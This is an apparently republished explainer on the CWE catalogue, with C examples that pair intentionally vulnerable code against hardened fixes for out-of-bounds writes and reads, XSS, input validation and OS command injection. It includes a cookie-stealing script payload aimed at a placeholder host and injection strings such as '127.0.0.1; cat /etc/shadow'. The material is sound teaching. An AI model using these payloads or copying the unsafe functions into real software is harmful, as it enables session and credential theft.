With data and network security a major concern for modern software development, several frameworks and guidelines have been developed to help build and operate secure systems. The Common Weakness Enumeration (CWE) is a community-developed catalog of the common types of weakness found in the software and hardware of an organization’s tech stack. Each entry gives a detailed description of the weakness type, and the catalog as a whole informs secure coding standards.
This article delves into the Common Weakness Enumeration, some of its most prominent weakness types, and commonly asked questions.
What is Common Weakness Enumeration?
The Common Weakness Enumeration (CWE) catalogs types of security weakness that can occur in any hardware or software product; it does not track flaws in specific products (that is the job of CVE). For each weakness type, CWE identifies and categorizes the flaw, the security consequences it can have, and the mitigations that prevent or detect it.
Maintained by MITRE, CWE is a community-developed catalog that supports a data-driven approach to security. Security teams typically use it as input to secure coding standards, to classify findings from code review and scanning tools, and to design a vulnerability management program. CWE is also valuable for managing cyber supply chain risk, because it gives a common vocabulary for describing and addressing weaknesses in the third-party components of an enterprise network.
What is a CWE Vulnerability?
A CWE entry describes a type of flaw in software or hardware that becomes a security vulnerability if it is left in place. The catalog contains over 600 weaknesses at the class and base levels, and the most dangerous of them, ranked by how often they appear in reported CVEs and how severe those CVEs are, make up the CWE Top 25. Each entry lists the weakness’s consequences, which helps organizations understand their attack surface, and the approaches that harden the affected systems.
Common Weakness Enumeration Examples
A few common weakness types from the CWE list include:
Out-of-Bounds Write (CWE-787)
This weakness arises when the application writes data before the beginning or past the end of the intended buffer. It typically happens when code copies input of unchecked length into a fixed-size buffer, performs pointer arithmetic, or computes an index that refers to a location outside the buffer. The resulting memory corruption often leads to a crash, corruption of data, or, when the attacker controls what is overwritten (a return address, a function pointer, an adjacent flag), execution of attacker-chosen code.
Out-of-bounds writes are among the most frequently reported weaknesses. The CWE Top 25 data cited in this article (the 2021 edition) counts 3033 CVEs in the National Vulnerability Database (NVD) mapped to CWE-787, with an average Common Vulnerability Scoring System (CVSS) score of 8.22 and an overall Top 25 score of 65.93, first in the ranking. Note that the NVD count measures how often the weakness is reported, not how easily a given instance can be exploited.
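As an added illustration (not code from the original article or from Crashtest Security), the C fragment below shows the weakness and its fix side by side. The `struct account`, the function names and the inputs are constructed for the example: a fixed-size `name` field sits directly in front of an `is_admin` flag, so an unchecked copy that runs off the end of `name` lands on the flag.

```c
#include <stddef.h>
#include <string.h>

/* Constructed record: a fixed-size field immediately followed by a
 * security-relevant flag. An out-of-bounds write into `name` runs straight
 * into `is_admin`. */
struct account {
    char name[16];
    int  is_admin;
};

/* Vulnerable (CWE-787): copies until the source's terminating NUL with no
 * bounds check. Any source of 16 bytes or more writes past `name`, and a
 * 20-byte source overwrites `is_admin` with attacker-chosen bytes. This is
 * undefined behaviour; it is kept only to contrast with the hardened version
 * and must never be called on untrusted input. */
void set_name_unsafe(struct account *acct, const char *src)
{
    size_t i = 0;
    while (src[i] != '\0') {
        acct->name[i] = src[i];
        i++;
    }
    acct->name[i] = '\0';
}

/* Hardened: bounds the copy by the destination's size, always NUL-terminates,
 * and fails closed (record untouched, returns -1) when the input does not fit,
 * so the caller can reject it instead of silently truncating. */
int set_name_safe(struct account *acct, const char *src)
{
    const size_t cap = sizeof acct->name;
    size_t len = 0;
    /* Bounded scan: never read more than `cap` bytes of the source either. */
    while (len < cap && src[len] != '\0')
        len++;
    if (len == cap)                 /* no room left for the NUL terminator */
        return -1;
    memcpy(acct->name, src, len);
    acct->name[len] = '\0';
    return 0;
}

/* Demo record (static storage, so zero-initialised); `is_admin` must still be
 * 0 after every call below. */
struct account demo_acct;

int main(void)
{
    /* Constructed inputs: a short name, then a 24-byte one that would overflow. */
    set_name_safe(&demo_acct, "alice");
    set_name_safe(&demo_acct, "AAAAAAAAAAAAAAAAAAAAAAAA");
    return demo_acct.is_admin;      /* 0: the over-long name was rejected */
}
```

The hardened version fails closed: rather than truncate, which can turn one valid name into a different valid name, it leaves the record untouched and reports the over-long input. Note that an address sanitizer will not flag the first bytes of this particular overflow, because they land inside the same struct; the bounds check has to be in the code.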
Out-of-Bounds Read (CWE-125)
CWE-125 arises when the application reads data before the beginning or past the end of the intended buffer. The bytes read come from whatever happens to sit in adjacent memory, so an adversary can leak sensitive information such as secret keys, session tokens, or pointer values that defeat address-space layout randomization and enable further exploitation.
An out-of-bounds read can also cause segmentation faults and crashes, that is, a denial of service. It typically occurs when code trusts an attacker-supplied length or offset, or processes variable-length data on the assumption that a terminator (such as a NUL byte) lies within the buffer when it does not.
CWE-125 is a moderately severe weakness type in the same data set: an average CVSS score of 6.94, an NVD count of 1448, and an overall Top 25 score of 24.9.
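The trusted-length variant is the one that produced Heartbleed (CVE-2014-0160). The C fragment below is an added example, not code from the original article or from Crashtest Security; the wire format, the message bytes and the function names are constructed for it. An echo service copies back as many bytes as the header claims, and the unsafe version never compares that claim with what was actually received.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed wire format for an echo service: a 2-byte big-endian length
 * field followed by that many payload bytes. The reply copies the payload. */

/* Vulnerable (CWE-125): trusts the length field. A message whose header
 * claims 65535 bytes but carries 5 makes memcpy read 65530 bytes beyond the
 * received data (keys, other sessions' buffers, whatever is adjacent) and
 * send them back. Shown only for contrast; never call on untrusted input. */
size_t echo_unsafe(const uint8_t *msg, uint8_t *reply)
{
    size_t claimed = ((size_t)msg[0] << 8) | msg[1];
    memcpy(reply, msg + 2, claimed);   /* never compared to what was received */
    return claimed;
}

/* Hardened: the declared length must fit inside the bytes actually received
 * and inside the reply buffer. Returns the number of bytes echoed, or -1 if
 * the message is malformed. */
long echo_safe(const uint8_t *msg, size_t msg_len, uint8_t *reply, size_t reply_cap)
{
    if (msg_len < 2)
        return -1;                     /* the header itself is incomplete */
    size_t claimed = ((size_t)msg[0] << 8) | msg[1];
    if (claimed > msg_len - 2)
        return -1;                     /* would read past the received data */
    if (claimed > reply_cap)
        return -1;                     /* would write past the reply (CWE-787) */
    memcpy(reply, msg + 2, claimed);
    return (long)claimed;
}

/* Constructed messages: a well-formed one and one that lies about its length. */
const uint8_t GOOD_MSG[]  = { 0x00, 0x05, 'h', 'e', 'l', 'l', 'o' };
const uint8_t LYING_MSG[] = { 0xFF, 0xFF, 'h', 'e', 'l', 'l', 'o' };  /* claims 65535, carries 5 */
uint8_t reply_buf[64];

int main(void)
{
    long n = echo_safe(GOOD_MSG, sizeof GOOD_MSG, reply_buf, sizeof reply_buf);    /* 5 */
    long m = echo_safe(LYING_MSG, sizeof LYING_MSG, reply_buf, sizeof reply_buf);  /* -1 */
    return (n == 5 && m == -1) ? 0 : 1;
}
```

Every length or offset that arrives over the wire is attacker data; the check is against the number of bytes the code actually holds, never against what the peer says it sent.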
Improper Neutralization of Input During Web Page Generation, or Cross-Site Scripting (CWE-79)
Better known as Cross-Site Scripting (XSS), this weakness lets an adversary inject script into a web page that other users view. It arises when an application places untrusted data into a dynamically generated page without neutralizing (escaping or encoding) it for the context it lands in. The injected script then runs in the victim’s browser with the privileges of the vulnerable site’s origin, where it can steal session cookies or tokens, read page content, and send requests on the victim’s behalf.
CWE-79 is the most frequently reported weakness of all in the cited data, with an NVD count of 3564. Its severity is medium, with an average CVSS score of 5.8 and an overall Top 25 score of 46.84.
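The C fragment below is an added example of "neutralization", not code from the original article or from Crashtest Security; the greeting template, the buffer sizes and the function names are constructed for it. It renders the same page twice, once by pasting the untrusted value straight into the HTML and once after escaping the five characters that carry meaning in an HTML text node or double-quoted attribute value.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable (CWE-79): the untrusted `name` is pasted into HTML as-is. A value
 * such as <script>fetch('//evil.example/?c='+document.cookie)</script> runs
 * in every visitor's browser within this site's origin. Shown only for contrast. */
int render_greeting_unsafe(const char *name, char *out, size_t out_cap)
{
    int n = snprintf(out, out_cap, "<p>Hello, %s!</p>", name);
    return (n < 0 || (size_t)n >= out_cap) ? -1 : n;
}

/* Escapes & < > " ' for the HTML text-node and double-quoted-attribute
 * contexts. Returns the escaped length, or -1 (with `out` emptied) if the
 * result would not fit: fail closed rather than emit a partially escaped page. */
long html_escape(const char *in, char *out, size_t out_cap)
{
    if (out_cap == 0)
        return -1;
    size_t used = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (used + rl >= out_cap) {        /* keep room for the terminator */
            out[0] = '\0';
            return -1;
        }
        memcpy(out + used, rep, rl);
        used += rl;
    }
    out[used] = '\0';
    return (long)used;
}

/* Hardened: the value is neutralised for the context it is interpolated into
 * (an HTML text node) before the template sees it. */
long render_greeting_safe(const char *name, char *out, size_t out_cap)
{
    char escaped[512];
    if (html_escape(name, escaped, sizeof escaped) < 0)
        return -1;
    int n = snprintf(out, out_cap, "<p>Hello, %s!</p>", escaped);
    return (n < 0 || (size_t)n >= out_cap) ? -1 : n;
}

char page_buf[1024];   /* output buffer used by main() */

int main(void)
{
    /* Constructed attacker input. */
    render_greeting_safe("<img src=x onerror=alert(1)>", page_buf, sizeof page_buf);
    puts(page_buf);    /* <p>Hello, &lt;img src=x onerror=alert(1)&gt;!</p> */
    return 0;
}
```

This encoder is only correct for the HTML body and quoted-attribute contexts. A value dropped inside a `<script>` block, a URL, a CSS rule or an unquoted attribute needs the encoder for that context; the rule is to escape at the point of output for the context of that output, and to treat a Content Security Policy and HttpOnly cookies as defense in depth rather than a substitute.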
Improper Input Validation (CWE-20)
CWE-20 occurs in applications that accept input but do not check that it has the properties required for safe processing: the expected type, length, range, format, and character set. Crafted input can then alter the control flow, consume or reach a restricted resource, or, combined with another weakness, lead to remote code execution. Input validation weaknesses typically stem from validation requirements that were never specified during design, or from not following development best practices such as validating at every trust boundary against an allowlist.
Improper input validation is severe on average, with a CVSS score of 7.25, and moderately frequent, with an NVD count of 1120 and an overall Top 25 score of 20.47.
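Two validators in C, added here as an example and not taken from the original article or from Crashtest Security (the function names and the port and username rules are constructed for it). The first shows why `atoi()` is not validation, and the second shows an allowlist check of the kind that removes the metacharacters every downstream injection depends on.

```c
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Weak (CWE-20): atoi() reports nothing. "80abc" becomes 80, "" and "abc"
 * become 0, and a 20-digit string is undefined behaviour, so the caller
 * proceeds on garbage without ever knowing. */
int parse_port_weak(const char *s)
{
    return atoi(s);
}

/* Hardened: the value must be entirely numeric, must not overflow, and must
 * lie in the range the caller can actually use. Returns the port or -1. */
int parse_port(const char *s)
{
    /* strtol() skips leading whitespace and accepts a sign; reject both up front. */
    if (s == NULL || *s == '\0' || isspace((unsigned char)*s) || *s == '+' || *s == '-')
        return -1;
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;                 /* overflow, or trailing characters ("80abc") */
    if (v < 1 || v > 65535)
        return -1;                 /* outside the valid TCP/UDP port range */
    return (int)v;
}

/* Allowlist check for a username: 1-32 characters from [a-z0-9_] and nothing
 * else. Rejecting everything outside the allowlist also rejects the quotes,
 * semicolons and angle brackets that CWE-78, CWE-79 and CWE-89 payloads need.
 * Returns 1 if valid, 0 otherwise. */
int valid_username(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 32)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(islower(c) || isdigit(c) || c == '_'))
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed inputs: the weak parser accepts all of these as "a port". */
    return (parse_port("80abc") == -1 && parse_port("65536") == -1 &&
            parse_port(" 22") == -1 && valid_username("alice; id") == 0) ? 0 : 1;
}
```

Validation is a property check at the trust boundary, not a blocklist of bad strings: the port parser asserts "digits only, no overflow, 1 to 65535" and the username check asserts "only these characters, this long", and anything that fails is refused rather than repaired.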
Improper Neutralization of Special Elements used in an OS Command, or OS Command Injection (CWE-78)
CWE-78 occurs in software that builds all or part of an operating system command from external input received from an upstream component (a web form, an API parameter, a file). The weakness, known as OS command injection, is present when the application does not neutralize the elements of that input (such as ;, |, &, $( ) and backticks) that change the meaning of the command once it is handed to the shell or another downstream component.
OS command injection lets an attacker execute arbitrary commands on the host with the privileges of the vulnerable process, without having any direct access to it. When that process runs with elevated privileges, as a service account, a setuid binary or root, the injected commands inherit them, so the impact often extends from the application to the entire system and its credentials.
OS command injection is moderately frequent, with an NVD count of 833, but attacks exploiting it are severe: an average CVSS score of 8.71 and an overall Top 25 score of 19.55.
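The C fragment below is an added example of the vulnerable pattern and its two-part fix, not code from the original article or from Crashtest Security; the `ping` wrapper, the hostname rule and the function names are constructed for it. The fix is first to allowlist the input and then to execute the program without a shell at all, so the shell's metacharacters never get a chance to be interpreted. It assumes a POSIX system (`fork`, `execvp`, `pipe`).

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable (CWE-78): the host name is spliced into a shell command line.
 * host = "127.0.0.1; cat /etc/shadow" makes /bin/sh run both commands with
 * the privileges of this process. Shown only for contrast. */
int ping_unsafe(const char *host)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "ping -c 1 %s", host);
    return system(cmd);
}

/* Hardened, step 1: allowlist the input. A host name here is 1-253 characters
 * of letters, digits, '.' and '-', and may not start with '-' (it would be
 * parsed as an option). Everything a shell could misinterpret is rejected. */
int is_valid_hostname(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 253 || s[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardened, step 2: run the program without a shell. argv reaches execvp() as
 * an array, so ';', '|', '$(...)' inside any element are ordinary bytes of
 * that one argument. The child's stdout is captured into `out`
 * (NUL-terminated). Returns the child's exit status, or -1 on failure. */
int run_no_shell(char *const argv[], char *out, size_t out_cap)
{
    int fds[2];
    if (out_cap == 0 || pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                           /* child */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);                           /* exec failed */
    }
    close(fds[1]);                            /* parent keeps the read end */
    size_t used = 0;
    ssize_t n;
    while (used + 1 < out_cap &&
           (n = read(fds[0], out + used, out_cap - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Both steps together: refuse anything outside the allowlist, then exec. */
int ping_safe(const char *host, char *out, size_t out_cap)
{
    if (!is_valid_hostname(host))
        return -1;
    char *const argv[] = { "ping", "-c", "1", (char *)host, NULL };
    return run_no_shell(argv, out, out_cap);
}

char cmd_out[256];   /* captured output used by echo_literal() and main() */

/* Hands one untrusted string to echo as a single argument. What comes back is
 * exactly that string, metacharacters included: nothing was interpreted. */
int echo_literal(const char *arg)
{
    char *const argv[] = { "echo", (char *)arg, NULL };
    return run_no_shell(argv, cmd_out, sizeof cmd_out);
}

int main(void)
{
    echo_literal("127.0.0.1; id");   /* constructed injection attempt */
    fputs(cmd_out, stdout);          /* prints the literal text, runs no `id` */
    return 0;
}
```

Either step alone is weaker than both: the allowlist protects the program being called from option and argument abuse that an argv array cannot prevent, and the argv array protects against a future developer loosening the allowlist. Neither step involves "escaping" for the shell, which is fragile across shells and platforms.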
Additional weaknesses on the CWE Top 25 list that range from high to medium severity include:
1. Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) – (CWE-89)
2. Use After Free – (CWE-416)
3. Improper Restriction of Operations within the Bounds of a Memory Buffer – (CWE-119)
4. Deserialization of Untrusted Data – (CWE-502)
5. Improper Authentication – (CWE-287)
6. Cross-Site Request Forgery (CSRF) – (CWE-352)
7. Missing Authorization – (CWE-862)
8. Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’) – (CWE-362)
9. Improper Neutralization of Special Elements used in a Command (‘Command Injection’) – (CWE-77)
What is the difference between CWE, CVE, and OWASP?
The Common Weakness Enumeration (CWE), Common Vulnerabilities and Exposures (CVE), and the Open Web Application Security Project (OWASP) are often mentioned together, but they serve different purposes.
CVE is a catalog of publicly disclosed vulnerabilities in specific products. Each entry has a unique identifier, describes one concrete flaw in one product or version, and in NVD is mapped to the CWE type that caused it.
OWASP is a community initiative best known for the OWASP Top 10, an awareness document listing the ten most critical categories of risk to web applications; each category is defined in terms of the CWEs it groups together.
CWE is the comprehensive catalog of weakness types that provides the baseline for identifying and remediating flaws in the software and hardware of an organization’s tech stack. The relationship runs in both directions: CVE records and the OWASP Top 10 cite CWE identifiers to say what kind of flaw they describe, and the CWE Top 25 ranking is computed from CVE records in NVD, using their CWE mappings, their frequency, and their CVSS scores to identify the most impactful weaknesses.
What purpose do CWE and CVSS serve?
The Common Weakness Enumeration (CWE) and the Common Vulnerability Scoring System (CVSS) are complementary: CWE gives a common vocabulary for what kind of flaw is present, while CVSS gives a common measure of how easy a specific vulnerability is to exploit and how much damage a successful exploit can do.
CWE helps organizations address vulnerabilities systematically by classifying every identified weakness. CVSS, on the other hand, scores a specific vulnerability from 0.0 to 10.0 from its base metrics (attack vector, attack complexity, privileges required, user interaction, scope, and the impact on confidentiality, integrity, and availability) and maps that score to a qualitative rating of None, Low, Medium, High, or Critical, so that the severity assigned to a vulnerability is reproducible and explainable.
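To make the scoring concrete, the C program below implements the CVSS v3.1 base score formula from the specification (metric weights, the Impact and Exploitability sub-scores, the scope-changed adjustment, and the specification's Roundup function) and parses standard vector strings. It is an added example, not code from the original article or from Crashtest Security, and the function names are its own; the sample vectors are the ones a practitioner meets most often.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* CVSS v3.1 base metrics, one letter each as they appear in a vector string. */
struct cvss31 {
    char av;        /* Attack Vector: N(etwork) A(djacent) L(ocal) P(hysical) */
    char ac;        /* Attack Complexity: L(ow) H(igh) */
    char pr;        /* Privileges Required: N(one) L(ow) H(igh) */
    char ui;        /* User Interaction: N(one) R(equired) */
    char s;         /* Scope: U(nchanged) C(hanged) */
    char c, i, a;   /* Confidentiality / Integrity / Availability impact: H L N */
};

/* Metric weights from the CVSS v3.1 specification (section 7.4). */
static double av_w(char v)  { return v == 'N' ? 0.85 : v == 'A' ? 0.62 : v == 'L' ? 0.55 : 0.20; }
static double ac_w(char v)  { return v == 'L' ? 0.77 : 0.44; }
static double ui_w(char v)  { return v == 'N' ? 0.85 : 0.62; }
static double cia_w(char v) { return v == 'H' ? 0.56 : v == 'L' ? 0.22 : 0.0; }
static double pr_w(char v, char scope)   /* PR weights rise when scope changes */
{
    if (v == 'N') return 0.85;
    if (v == 'L') return scope == 'C' ? 0.68 : 0.62;
    return scope == 'C' ? 0.50 : 0.27;
}

/* Roundup() from appendix A: one decimal place, always rounded up. Done in
 * integer arithmetic so no libm is needed and no floating-point surprises. */
static double roundup(double x)
{
    long long i = (long long)(x * 100000.0 + 0.5);
    return (i % 10000 == 0) ? i / 100000.0 : (i / 10000 + 1) / 10.0;
}

static double pow_int(double b, int e)
{
    double r = 1.0;
    while (e-- > 0) r *= b;
    return r;
}

/* Base score (0.0 to 10.0) per section 7.1 of the specification. */
double cvss31_base_score(const struct cvss31 *m)
{
    double iss = 1.0 - (1.0 - cia_w(m->c)) * (1.0 - cia_w(m->i)) * (1.0 - cia_w(m->a));
    double impact = (m->s == 'C') ? 7.52 * (iss - 0.029) - 3.25 * pow_int(iss - 0.02, 15)
                                  : 6.42 * iss;
    double expl = 8.22 * av_w(m->av) * ac_w(m->ac) * pr_w(m->pr, m->s) * ui_w(m->ui);
    if (impact <= 0.0)
        return 0.0;
    double raw = (m->s == 'C') ? 1.08 * (impact + expl) : impact + expl;
    return roundup(raw > 10.0 ? 10.0 : raw);
}

/* Qualitative rating bands from section 5 of the specification. */
const char *cvss31_rating(double score)
{
    if (score == 0.0) return "None";
    if (score < 4.0)  return "Low";
    if (score < 7.0)  return "Medium";
    if (score < 9.0)  return "High";
    return "Critical";
}

static int one_of(char v, const char *set) { return strchr(set, v) != NULL; }

/* Parses "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H". Returns 0, or -1 when
 * the prefix is wrong, a metric is missing, or a value is not allowed. */
int cvss31_parse(const char *vec, struct cvss31 *m)
{
    if (strncmp(vec, "CVSS:3.1/", 9) != 0)
        return -1;
    memset(m, 0, sizeof *m);
    for (const char *p = vec + 9; *p; ) {
        const char *colon = strchr(p, ':');
        if (colon == NULL || colon[1] == '\0')
            return -1;
        size_t klen = (size_t)(colon - p);
        char val = colon[1];
        if      (klen == 2 && !strncmp(p, "AV", 2) && one_of(val, "NALP")) m->av = val;
        else if (klen == 2 && !strncmp(p, "AC", 2) && one_of(val, "LH"))   m->ac = val;
        else if (klen == 2 && !strncmp(p, "PR", 2) && one_of(val, "NLH"))  m->pr = val;
        else if (klen == 2 && !strncmp(p, "UI", 2) && one_of(val, "NR"))   m->ui = val;
        else if (klen == 1 && p[0] == 'S' && one_of(val, "UC"))            m->s  = val;
        else if (klen == 1 && p[0] == 'C' && one_of(val, "HLN"))           m->c  = val;
        else if (klen == 1 && p[0] == 'I' && one_of(val, "HLN"))           m->i  = val;
        else if (klen == 1 && p[0] == 'A' && one_of(val, "HLN"))           m->a  = val;
        else return -1;
        p = colon + 2;
        if (*p == '/') p++;
        else if (*p != '\0') return -1;
    }
    return (m->av && m->ac && m->pr && m->ui && m->s && m->c && m->i && m->a) ? 0 : -1;
}

/* Score straight from a vector string; -1.0 if it does not parse. */
double cvss31_score_vector(const char *vec)
{
    struct cvss31 m;
    return cvss31_parse(vec, &m) == 0 ? cvss31_base_score(&m) : -1.0;
}

int main(void)
{
    const char *v = "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N";   /* typical reflected XSS */
    double s = cvss31_score_vector(v);
    printf("%s -> %.1f (%s)\n", v, s, cvss31_rating(s));
    return 0;
}
```

Running the reflected-XSS vector through it gives 6.1 (Medium), which is why CWE-79 has a medium average severity despite its frequency, while an unauthenticated remote code execution vector (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) gives 9.8 (Critical). The base score is only the first layer; temporal and environmental metrics adjust it for exploit availability and for the asset's importance in a specific environment.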
This article has already been published on https://crashtest-security.com/common-weakness-enumeration/ and has been authorized by Crashtest Security for a republish.
Featured Image Courtesy – Photo by Desola Lanre-Ologun on Unsplash
Sudip is a Norwich, UK-based Technical Writer who writes content on Cloud, DevOps and Cyber Security. He has more than 15 years of experience as a Solution Architect in IT Infrastructure, and is an avid traveler and follower of sports.